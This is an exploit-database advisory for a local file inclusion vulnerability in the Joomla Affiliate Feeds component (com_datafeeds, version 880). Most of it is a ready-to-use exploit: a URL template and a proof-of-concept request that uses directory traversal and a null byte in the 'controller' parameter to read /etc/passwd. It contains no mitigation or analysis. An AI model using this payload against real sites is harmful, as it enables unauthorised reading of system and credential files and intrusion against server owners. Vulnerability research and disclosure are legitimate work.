id: 11649
date: 04/06/2010
title: Joomla Component Affiliate Feeds com_datafeeds Local File Inclusion
author: AntiSecurity
cves: 

=================================================================================
Joomla Component Affiliate Feeds com_datafeeds Local File Inclusion Vulnerability
=================================================================================

===============================================================================================================
 
 
  [o] Joomla Component Affiliate Feeds Local File Inclusion Vulnerability
  
       Software : com_datafeeds version 880
       Vendor   : http://www.affiliatefeeds.nl/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_datafeeds&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
 
 
===============================================================================================================



#  0day.today [2023-03-21]  #